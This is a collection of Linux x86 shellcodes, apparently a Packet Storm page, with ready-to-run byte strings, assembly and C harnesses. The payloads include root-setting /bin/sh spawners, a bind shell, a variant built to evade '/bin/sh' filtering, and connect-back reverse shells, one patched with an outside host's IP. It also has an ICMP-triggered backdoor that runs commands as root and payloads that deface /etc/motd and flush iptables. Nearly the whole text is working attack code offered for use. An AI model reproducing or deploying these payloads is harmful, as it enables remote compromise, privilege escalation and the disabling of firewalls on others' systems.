Collection of shellcodes for linux.
3c19b131e184dcf90f91193157d4811dead6e20644e8e1cc5d14ae86b35b892e//////////////////////////////////////////
///Collection of Linux(x86) shellcodes///
/////////////////////////////////////////
writed and modifed by ChoiX
-----------------------------------------------------------
1. Execve() shellcodes
----------------------------
a)Simple shellcode
Size:46 byte
Description: Makes setreuid(0,0); excave /bin/sh; exit;
Code:
#include <stdio.h>
char
shellcode[]=
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
int main(){
void (*funct) ();
(long) funct = &shellcode;
funct();
}
----------------------------
b)Simple2 shellcode
Size: 32 byte
Discription: Simple shellcode which makes setuid(0); excve("/bin/sh",0);
Code:
/*assamler code
__asm__("
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al
int $0x80
xorl %eax,%eax
cdq
push %eax
pushl $0x68732f6e
pushl $0x69622f2f
mov %esp, %ebx
push %eax
push %ebx
mov %esp,%ecx
movb $0xb, %al
int $0x80
");*/
char main[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0); */
"\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68" /* execve() of /bin/sh */
"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80";
-----------------------------------------------------------
2. Bind shellcodes
-----------------------------------------------------------
a)Bind shellcode
Size:156 byte
Discription: shellcode that binds /bin/sh on port 30464
Code:
char shellcode[] =
/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xd2" // xorl %edx,%edx
"\xb0\x66" // movb $0x66,%al
"\xb3\x01" // movb $0x1,%bl
"\x51" // pushl %ecx
"\xb1\x06" // movb $0x6,%cl
"\x51" // pushl %ecx
"\xb1\x01" // movb $0x1,%cl
"\x51" // pushl %ecx
"\xb1\x02" // movb $0x2,%cl
"\x51" // pushl %ecx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xcd\x80" // int $0x80
/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */
"\xb3\x02" // movb $0x2,%bl
"\xb1\x02" // movb $0x2,%cl
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77" // addb $0x77,%cl
"\x66\x51" // pushl %cx
"\xb1\x02" // movb $0x2,%cl
"\x66\x51" // pushw %cx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb2\x10" // movb $0x10,%dl
"\x52" // pushl %edx
"\x51" // pushl %ecx
"\x50" // pushl %eax
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x89\xc2" // movl %eax,%edx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
/* listen(fd, 1) */
"\xb3\x01" // movb $0x1,%bl
"\x53" // pushl %ebx
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\x80\xc3\x03" // addb $0x3,%bl
"\xcd\x80" // int $0x80
/* cli = accept(fd, 0, 0) */
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb3\x05" // movl $0x5,%bl
"\xb0\x66" // movl $0x66,%al
"\xcd\x80" // int $0x80
/* dup2(cli, 0) */
"\x89\xc3" // movl %eax,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80
/* dup2(cli, 1) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movl $0x3f,%al
"\xcd\x80" // int $0x80
/* dup2(cli, 2) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80
/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"\x31\xdb" // xorl %ebx,%ebx
"\x53" // pushl %ebx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x8d\x54\x24\x08" // leal 0x8(%esp),%edx
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x53" // pushl %ebx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80" // int $0x80
/* exit(%ebx) */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // movb $0x1,%al
"\xcd\x80"; // int $0x80
int main(void)
{
void (*funct)();
(long) funct = &shellcode;
funct();
}
----------------------------
b)/bin/sh filtering evading
Size:51 byte
Discription:???
Code:
char shellcode[] =
/* setreuid(0,0) 10 */
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x46" // movb $0x46,%al
"\xcd\x80" // int $0x80
/* execve("//bin/sh", ["//bin/sh", NULL], [NULL]) */
"\x53" // pushl %ebx
/*
* shifting all "/bin/sh" to left by one, stuff it in %eax,
* then shift it to right by one, evading "/bin/sh" filtering !!!
*/
"\xb8\xdc\x5e\xe6\xd0" // movl $0xd0e65edc,%eax
"\xd1\xe8" // shrl %eax
"\x50" // pushl %eax
"\xb8\x5e\x5e\xc4\xd2" // movl $0xd2c45e5e,%eax
"\xd1\xe8" // shrl %eax
"\x50" // pushl %eax
"\x89\xe3" // movl %esp,%ebx
"\x8d\x54\x24\x08" // leal 8(%esp),%edx
"\x51" // pushl %ecx
"\x53" // pushl %ebx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
int main(void)
{
void (*fptr)();
(long) fptr = &shellcode;
fptr();
}
-----------------------------------------------------------
4. Connectback shellcodes
-----------------------------------------------------------
a)Simple connectback shellcode
Size:131 byte
Description:shellcode which connect to port 45295(0xb0ef)
Code:
#include <stdio.h>
char
shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
int
c_code()
{
char *argv[2];
char *sockaddr = "\x02\x00"// Address family
"\xef\xb0"// port
"\x00\x00\x00\x00"// sin_addr
"\x00\x00\x00\x00"
"\x00\x00\x00\x00";
int sock;
sock = socket(2, 1, 6);
if (connect(sock, sockaddr, 16) < 0) exit();
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
argv[0] = "//bin/sh";
argv[1] = NULL;
execve(argv[0], &argv[0], NULL);
exit();
}
int
asm_code()
{
__asm("# sock = socket(2, 1, 6);
xorl %eax,%eax
xorl%ebx, %ebx
xorl %ecx,%ecx
pushl%ecx
movb$6,%cl# IPPROTO_TCP
pushl%ecx
movb$1,%cl# SOCK_STREAM
pushl%ecx
movb$2,%cl# AF_INET
pushl %ecx
movl %esp,%ecx
movb $1, %bl# SYS_SOCKET
movb $102, %al# SYS_socketcall
int $0x80
# connect(sock, sockaddr, 16)
movl%eax, %edx
xorl %eax,%eax
xorl%ecx,%ecx
pushl%ecx
pushl %ecx
pushl $0x44434241# ip address
pushw$0xefb0# port
movb$0x02,%cl# address family
pushw%cx
movl%esp,%edi
movb$16,%bl# sizeof(sockaddr)
pushl%ebx
pushl %edi
pushl%edx# sock
movl%esp,%ecx
movb $3, %bl # SYS_CONNECT
movb $102, %al# SYS_socketcall
int$0x80
xorl %ecx,%ecx
cmpl%eax,%ecx
je CONNECTED
# exit()
xorl%eax,%eax
movb$1,%al# SYS_exit
int$0x80
CONNECTED:
# dup2(sock, 0);
xorl %eax,%eax
movb $63,%al# SYS_dup2
movl%edx,%ebx# sock
int $0x80
# dup2(sock, 1);
xorl %eax, %eax
movb $63, %al # SYS_dup2
movl %edx, %ebx # sock
movb$1,%cl# stdout
int $0x80
# dup2(sock, 2);
xorl %eax, %eax
movb $63, %al # SYS_dup2
movl %edx, %ebx # sock
movb $2, %cl# stderr
int $0x80
# execve(argv[0], &argv[0], NULL);
xorl %eax,%eax
xorl%edx,%edx
pushl%eax
pushl $0x68732f6e# the string
pushl $0x69622f2f# //bin/sh
movl%esp, %ebx
pushl%eax
pushl%ebx
movl%esp,%ecx
movb$11,%al# SYS_execve
int $0x80
# exit()
xorl %eax, %eax
movb $1, %al # SYS_exit
int $0x80
");
}
int
main()
{
void (*funct)();
shellcode[33] = 81;/* ip of www.netric.org :) */
shellcode[34] = 17;
shellcode[35] = 46;
shellcode[36] = 156;
(long) funct = &shellcode;
funct();
return 0;
}
----------------------------
b)forking connectback shellcode
Size:102 bytes
Discription: shellcode that forking connect to port 39321
Code:
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#define IP"\x0a\x00\x00\x02"/* 10.0.0.2 */
#define PORT"\x99\x99"/* 39321 */
char shellcode[] =
"\x31\xc0"/* xorl %eax,%eax */
"\xb0\x02"/* movb $0x2,%al*/
"\xcd\x80"/* int $0x80 [fork()]*/
"\x31\xdb"/* xorl %ebx,%ebx*/
"\x39\xd8"/* cmpl %ebx,%eax*/
"\x75\x54"/* jne 0x54*/
"\x50"/* push %eax*/
"\x40"/* incl %eax*/
"\x50"/* push %eax*/
"\x40"/* incl %eax*/
"\x50"/* push %eax*/
"\x89\xe1"/* movl %esp,%ecx*/
"\x43"/* incl %ebx*/
"\xb0\x66"/* movb $0x66,%al*/
"\xcd\x80"/* int $0x80 [socket()]*/
"\x4b"/* decl %ebx*/
"\x53"/* push %ebx*/
"\x53"/* push %ebx*/
"\x68"IP/* push IP*/
"\x66\x68"PORT/* pushw PORT*/
"\xb3\x02"/* movb $0x2,%bl*/
"\x66\x53"/* pushw %bx*/
"\x89\xe2"/* movl %esp,%edx*/
"\xb3\x10"/* movb $0x10,%bl*/
"\x53"/* push %ebx*/
"\x52"/* push %edx*/
"\x50"/* push %eax*/
"\x89\xe1"/* movl %esp,%ecx*/
"\xb3\x03"/* movb $0x3,%bl*/
"\xb0\x66"/* movb $0x66,%al*/
"\xcd\x80"/* int $0x80 [connect()]*/
"\x31\xc9"/* xorl %ecx,%ecx*/
"\x39\xc1"/* cmpl %eax,%ecx*/
"\x75\x23"/* jne 0x23*/
"\x58"/* popl %eax*/
"\xb1\x02"/* movb $0x2,%cl*/
"\xb0\x3f"/* movb $0x3f,%al*/
"\xcd\x80"/* int $0x80 [dup2()]*/
"\x49"/* decl %ecx*/
"\x75\xf9"/* jnz -0x7*/
"\xb0\x3f"/* movb $0x3f,%al*/
"\xcd\x80"/* int $0x80 [dup2()]*/
"\x50"/* push %eax*/
"\x68\x2f\x2f\x73\x68"/* push '//sh'*/
"\x68\x2f\x62\x69\x6e"/* push '/bin'*/
"\x89\xe3"/* movl %esp,%ebx*/
"\x50"/* push %eax*/
"\x53"/* push %ebx*/
"\x89\xe1"/* movl %esp,%ecx*/
"\x99"/* cdq*/
"\xb0\x0b"/* movb $0x0b,%al*/
"\xcd\x80"/* int $0x80 [execve()]*/
"\x31\xc0"/* xorl %eax,%eax*/
"\x40"/* incl %eax*/
"\xcd\x80";/* int $0x80*/
void asm_code() {
asm ("
xorl %eax,%eax
movb $0x2,%al
int $0x80# [fork]
xorl %ebx,%ebx
cmp %ebx,%eax
jne HOU_OP_MET_DAT_GESODERMIETER
push %eax
incl %eax
push %eax
incl %eax
push %eax
movl %esp,%ecx
incl %ebx
movb $0x66,%al
int $0x80# [socket]
decl %ebx
push %ebx
push %ebx
push $0x0200000a
pushw $0x9999
movb $0x2,%bl
pushw %bx
movl %esp,%edx
movb $0x10,%bl
push %ebx
push %edx
push %eax
movl %esp,%ecx
movb $0x3,%bl
movb $0x66,%al
int $0x80# [connect]
xorl %ecx,%ecx
cmpl %eax,%ecx
jne HOU_OP_MET_DAT_GESODERMIETER
movb $0x2,%cl
DUPLOOP:
movb $0x3f, %al
int $0x80# [dup2]
decl %ecx
jnz DUPLOOP
movb $0x3f, %al
int $0x80# [dup2]
push %eax
push $0x68732f6e
push $0x69622f2f
movl %esp,%ebx
push %eax
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80# [execve]
HOU_OP_MET_DAT_GESODERMIETER:
xorl %eax,%eax
incl %eax
int $0x80# [exit]
");
}
void c_code() {
int fd,i;
char *prog[] = {"/bin/sh",NULL};
char *them = "\x02\x00"
"\x99\x99" /* PORT 0x9999 = 39321 */
"\x0a\x00\x00\x02" /* IP 10.0.0.2 */
"\x00\x00\x00\x00"
"\x00\x00\x00\x00";
if (!fork()) {
fd = socket(2,1,0);
connect(fd,(struct sockaddr *)them,16);
for (i = 0; i < 2; i++) dup2(fd,i);
execve(prog[0],prog,NULL);
}
}
int main() {
int (*a)();
a = (int (*)())shellcode;
printf("shellcode size = %d\n\n",sizeof(shellcode));
a();
return 0;
}
-----------------------------------------------------------
3. ICMP bind shellcodes
-----------------------------------------------------------
a)Simple icmp bind shellcode
Size: 137 byte
Description: example of using
[/home/choix/codes/shellcodes/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
[/home/choix/codes/shellcodes/icmp]# cat out
uid=0(root) gid=0(root) groups=0(root)
Code:
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SECRET_CHAR"\x99"
char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89"
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb"
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43"
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
"\xff"
"/bin/sh -c";
void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80/* socket(); */
movl %eax,%edx
movb $0x2,%al
int $0x80/* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit
endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80/* recvfrom(); */
movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al/* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop
movb $0x2,%al
int $0x80/* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80/* close(); */
pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80/* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80/* exit(); */
stack:
call execve
.string \"/bin/sh -c\"
");
}
void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL};
fd = socket(2,3,1);
if (fork() > 0) exit(0);
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
buf[nb-1] = 0;
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
}
}
int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
i();
return 0;
}
-----------------------------------------------------------
4. Other shellcodes
-----------------------------------------------------------
a)fun 1 shellcode
Size: 77 byte
Discription: shellcode writes “unl0ck rulez!!!” in /etc/motd
Code:
char shellcode[] =
/*fd = open("/etc////motd", O_WRONLY | O_APPEND); */
"\x31\xc0" // xorl %eax,%eax
"\x31\xc9" // xorl %ecx,%ecx
"\xb0\x05" // movb $0x5,%al
"\x66\xb9\x01\x04" // movw $0x401,%cx
"\x31\xd2" // xorl %edx,%edx
"\x52" // pushl %edx
"\x68\x6d\x6f\x74\x64" // pushl $0x64746f6d
"\x68\x2f\x2f\x2f\x2f" // pushl $0x2f2f2f2f
"\x68\x2f\x65\x74\x63" // pushl $0x6374652f
"\x8d\x1c\x24" // leal (%esp),%ebx
"\xcd\x80" // int $0x80
/* write(fd, "unl0ck rulez!!!\n",16); */
"\x89\xc3" // movl %eax,%ebx
"\x31\xc0" // xorl %eax,%eax
"\xb2\x10" // movb $0x10,%dl
"\xb0\x04" // movb $0x4,%al
"\x51" // pushl %ecx
"\x68\x21\x21\x21\x0a" // pushl $0x0a212121
"\x68\x75\x6c\x65\x7a" // pushl $0x7a656c75
"\x68\x63\x6b\x20\x72" // pushl $0x72206b69
"\x68\x75\x6e\x6c\x30" // pushl $0x306c6e75
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xcd\x80" // int $0x80
/* exit(%ebx) */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // movb $0x1,%al
"\xcd\x80"; // int $0x80
int main(void)
{
void (*funct) ();
(long) funct = &shellcode;
printf("strlen(shellcode): %u\n", strlen(shellcode));
funct();
----------------------------
b)fun2 shellcode
Size:36 byte
Description: shellcode writes “unl0ck was here” in stdout
Code:
#include <stdio.h>
char
shellcode[]=
// write(stdout,"unl0ck was here\n", 16);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xd2" // xor %edx,%edx
"\x68\x65\x72\x65\x0a" // push $0xa657265
"\x68\x61\x73\x20\x68" // push $0x68207361
"\x68\x63\x6b\x20\x77" // push $0x77206b63
"\x68\x75\x6e\x6c\x30" // push $0x306c6e75
"\x89\xe1" // mov %esp,%ecx
"\xb2\x10" // mov $0x10,%dl
"\x43"// inc %ebx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax
// exit;
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
int
main()
{
void (*funct) ();
(long) funct = &shellcode;
funct();
}
----------------------------
c)”flush” shellcode
Size: 61 byte
Description: shellcode that makes /sbin/iptables –flush
Code:
char
main[] =
"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
"\x39\xd8\x75\x2d\x31\xc0\x50\x66"
"\x68\x2d\x46\x89\xe6\x50\x68\x62"
"\x6c\x65\x73\x68\x69\x70\x74\x61"
"\x68\x62\x69\x6e\x2f\x68\x2f\x2f"
"\x2f\x73\x89\xe3\x8d\x54\x24\x10"
"\x50\x56\x54\x89\xe1\xb0\x0b\xcd"
"\x80\x89\xc3\x31\xc0\x31\xc9\x31"
"\xd2\xb0\x07\xcd\x80";
/* your evil shellcode here */
int
asm_code()
{
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
movb $2, %al
int $0x080
cmpl %ebx,%eax
jne WAIT
xorl %eax,%eax
pushl %eax
pushw $0x462d
movl %esp,%esi
pushl %eax
pushl $0x73656c62
pushl $0x61747069
pushl $0x2f6e6962
pushl $0x732f2f2f
movl %esp,%ebx
leal 0x10(%esp),%edx
pushl %eax
pushl %esi
pushl %esp
movl %esp,%ecx
movb $0xb,%al
int $0x80
WAIT:
movl %eax, %ebx
xorl %eax, %eax
xorl %ecx, %ecx
xorl %edx, %edx
movb $7, %al
int $0x80
");
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed